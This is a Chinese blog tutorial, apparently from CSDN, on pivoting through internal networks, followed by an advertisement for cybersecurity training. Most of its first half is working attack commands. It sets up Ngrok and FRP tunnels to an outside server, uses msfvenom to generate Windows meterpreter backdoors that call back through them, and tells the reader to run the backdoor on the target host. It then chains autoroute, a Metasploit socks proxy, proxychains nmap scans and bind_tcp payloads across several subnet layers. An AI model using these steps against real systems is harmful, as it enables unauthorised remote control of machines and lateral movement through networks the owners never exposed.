内网安全：Socks 代理 -- 本地代理技术.

教IT的无语强

于 2024-07-21 12:00:00 发布

阅读量870

点赞数 14

文章标签：安全网络

本文链接：https://blog.csdn.net/qq_44005305/article/details/140558384

版权

内网安全：Socks 代理 || 本地代理技术.

Socks

代理又称全能代理，就像有很多跳线的转接板，它只是简单地将一端的系统连接到另外一端。支持多种协议，包括http、ftp请求及其它类型的请求。它分socks 4
和socks 5两种类型，socks 4只支持TCP协议而socks 5支持TCP/UDP协议，还支持各种身份验证机制等协议。其标准端口为1080.

两个内网通讯上线（ Ngrok ）

开通隧道工具：https://www.ngrok.cc/user.html


理解：二个内网主机不能相互连接的，这样就可以通过开通的隧道进行连接.
（开通的隧道就是在外网开通一个域名：当目标访问这个域名，则会将数据返还回来到kali中）

（1）开通隧道：

（2）下载客户端：

解压放到 kali 中：（切换的刚刚下载的文件目录中）

（1）./sunny clientid 115735315695        // 执行 

    ./sunny clientid 隧道的IP

（3）生成一个程序后门：（木马）

msfvenom -p windows/meterpreter/reverse_http lhost=bgxg.free.idcfengye.com lport=80 -f exe -o bgxg.exe

（4）进行监听：（kali）

（1）msfconsole

（2）use exploit/multi/handler

（3）set payload windows/meterpreter/reverse_http

（4）set lhost 192.168.0.106        // 本地的 IP 地址

（5）set lport 4444                 // 本地的 端口.

（6）exploit

两个内网通讯上线（ Frp 自建跳板）

（1）跳板环境搭建：

需要有自己的服务器，有来搭建跳板.


【服务器 和 控制端】需要下载的工具：https://github.com/fatedier/frp/releases

服务器修改配置文件 frps.ini：
[common]
bind_port = 6677            // 这个端口修改为 服务器 开放的就行

启动服务端：【切换在下载的目录并执行】
./frps -c ./frps.ini


控制端修改配置文件 frpc.ini：
[common]
server_addr = 云主机 IP 地址
server_port = 6677                 // frpc 工作端口，必须和上面 frps 保持一致
[msf]
type = tcp
local_ip = 127.0.0.1
local_port = 5555                  // 转发给本机的 5555
remote_port = 6000                 // 服务端用 6000 端口转发给本机

启动客户端：【切换在下载的目录并执行】
./frpc -c ./frpc.ini

（2）生成程序后面：（木马）

msfvenom -p windows/meterpreter/reverse_tcp lhost=服务器（公网）的IP地址 lport=6000 -f exe -o frp.exe

（3）进行监听：（kali）

（1）msfconsole

（2）use exploit/multi/handler

（3）set payload windows/meterpreter/reverse_tcp

（4）set LHOST 127.0.0.1    

（5）set LPORT 5555        // 本机监听的端口【和控制端的一样】

（6）exploit

然后把程序后门（木马）放在目标主机上执行就行.

本地代理：（ MSF 跳板多个内网主机系列）

第二层内网代理：

（1）信息收集及配置访问：

（1）run get_local_subnets            // 获取网络接口

（2）run autoroute -p                 // 查看路由地址

（3）run autoroute -s 10.0.20.0/24    // 添加地二层内网的路由网段.

或

（3）run post/multi/manage/autoroute        // 自动添加，目前所有路由网段

（2）开启本地代理：

background                            // 挂起会话

如果是msf6，使用代理模板为：

use auxiliary/server/socks_proxy

如果是msf5，使用代理模板为：

use auxiliary/server/socks4a


（1）set srvport 2222        // 设置本地代理端口为2222

（2）exploit                 // 运行

（3）内网扫描：

打开 /etc/proxychains4.conf 文件：

socks4 192.168.0.106 2222                // 添加 本地的代理和端口

进行扫描：

proxychains4 nmap -sT -Pn 10.0.20.0/24 -p 80 

-Pn：扫描主机检测其是否受到数据包过滤软件或防火墙的保护.

-sT：扫描 TCP 数据包已建立的连接 connect

（4）浏览器访问：

第三层内网代理：

（1）生成正向程序后门：

msfvenom -p windows/x64/meterpreter/bind_tcp LPORT=54321 -f exe > 54321.exe

（2）进行监听：

要在和上面一样的 msf 会话中执行.

（1）use exploit/multi/handler    

（2）set payload windows/x64/meterpreter/bind_tcp

（3）set rhost 10.0.20.99                // 第二层内网的 IP 地址

（4）set lport 54321                     // 和程序后面（木马）一样的端口

（5）exploit

（3）信息收集及配置访问：

（1）run get_local_subnets            // 获取网络接口

（2）run autoroute -p                 // 查看路由地址

（3）run post/multi/manage/autoroute        // 自动添加，目前所有路由网段.

（4）开启本地代理：

background                            // 挂起会话

如果是msf6，使用代理模板为：

use auxiliary/server/socks_proxy

如果是msf5，使用代理模板为：

use auxiliary/server/socks4a

（1）set srvport 6666        // 默认端口6666

（2）exploit                 // 运行

第四层内网渗透：

（1）生成正向程序后门：

msfvenom -p windows/x64/meterpreter/bind_tcp LPORT=9876 -f exe > 9876.exe

（2）进行监听：

要在和上面一样的 msf 会话中执行.

（1）use exploit/multi/handler    

（2）set payload windows/x64/meterpreter/bind_tcp

（3）set rhost 10.0.10.110                // 第二层内网的 IP 地址

（4）set lport 9876                     // 和程序后面（木马）一样的端口

（5）exploit

学习链接：第70天：内网安全-
域横向内网漫游Socks代理隧道技术_哔哩哔哩_bilibili

学习网络安全技术的方法无非三种:

第一种是报网络安全专业，现在叫网络空间安全专业，主要专业课程:程序设计、计算机组成原理原理、数据结构、操作系统原理、数据库系统、计算机网络、人工智能、自然语言处理、社会计算、网络安全法律法规、网络安全、内容安全、数字取证、机器学习，多媒体技术，信息检索、舆情分析等。

第二种是自学，就是在网上找资源、找教程，或者是想办法认识一-些大佬，抱紧大腿，不过这种方法很耗时间，而且学习没有规划，可能很长一段时间感觉自己没有进步，容易劝退。

如果你对网络安全入门感兴趣，那么你需要的话可以点击这里👉网络安全重磅福利：入门&进阶全套282G学习资源包免费分享！

第三种就是去找培训。

接下来，我会教你零基础入门快速入门上手网络安全。

网络安全入门到底是先学编程还是先学计算机基础？这是一个争议比较大的问题，有的人会建议先学编程，而有的人会建议先学计算机基础，其实这都是要学的。而且这些对学习网络安全来说非常重要。但是对于完全零基础的人来说又或者急于转行的人来说，学习编程或者计算机基础对他们来说都有一定的难度，并且花费时间太长。

第一阶段：基础准备 4周~6周

这个阶段是所有准备进入安全行业必学的部分，俗话说：基础不劳，地动山摇

第二阶段：web渗透

学习基础时间：1周 ~ 2周：

① 了解基本概念：（SQL注入、XSS、上传、CSRF、一句话木马、等）为之后的WEB渗透测试打下基础。
② 查看一些论坛的一些Web渗透，学一学案例的思路，每一个站点都不一样，所以思路是主要的。
③ 学会提问的艺术，如果遇到不懂得要善于提问。

配置渗透环境时间：3周 ~ 4周：

① 了解渗透测试常用的工具，例如（AWVS、SQLMAP、NMAP、BURP、中国菜刀等）。
② 下载这些工具无后门版本并且安装到计算机上。
③ 了解这些工具的使用场景，懂得基本的使用，推荐在Google上查找。

渗透实战操作时间：约6周：

① 在网上搜索渗透实战案例，深入了解SQL注入、文件上传、解析漏洞等在实战中的使用。
② 自己搭建漏洞环境测试，推荐DWVA，SQLi-labs，Upload-labs，bWAPP。
③ 懂得渗透测试的阶段，每一个阶段需要做那些动作：例如PTES渗透测试执行标准。
④ 深入研究手工SQL注入，寻找绕过waf的方法，制作自己的脚本。
⑤ 研究文件上传的原理，如何进行截断、双重后缀欺骗(IIS、PHP)、解析漏洞利用（IIS、Nignix、Apache）等，参照：上传攻击框架。
⑥ 了解XSS形成原理和种类，在DWVA中进行实践，使用一个含有XSS漏洞的cms，安装安全狗等进行测试。
⑦ 了解一句话木马，并尝试编写过狗一句话。
⑧ 研究在Windows和Linux下的提升权限，Google关键词：提权

以上就是入门阶段

第三阶段：进阶

已经入门并且找到工作之后又该怎么进阶？详情看下图

给新手小白的入门建议：
新手入门学习最好还是从视频入手进行学习，视频的浅显易懂相比起晦涩的文字而言更容易吸收，这里我给大家准备了一套网络安全从入门到精通的视频学习资料包免费领取哦！

如果你对网络安全入门感兴趣，那么你需要的话可以点击这里👉网络安全重磅福利：入门&进阶全套282G学习资源包免费分享！

教IT的无语强

关注

14
点赞
踩
25

收藏

觉得还不错? 一键收藏
0
评论
内网安全：Socks 代理 -- 本地代理技术.

第一种是报网络安全专业，现在叫网络空间安全专业，主要专业课程:程序设计、计算机组成原理原理、数据结构、操作系统原理、数据库系统、计算机网络、人工智能、自然语言处理、社会计算、网络安全法律法规、网络安全、内容安全、数字取证、机器学习，多媒体技术，信息检索、舆情分析等。第二种是自学，就是在网上找资源、找教程，或者是想办法认识一-些大佬，抱紧大腿，不过这种方法很耗时间，而且学习没有规划，可能很长一段时间感觉自己没有进步，容易劝退。③ 了解这些工具的使用场景，懂得基本的使用，推荐在Google上查找。
复制链接

扫一扫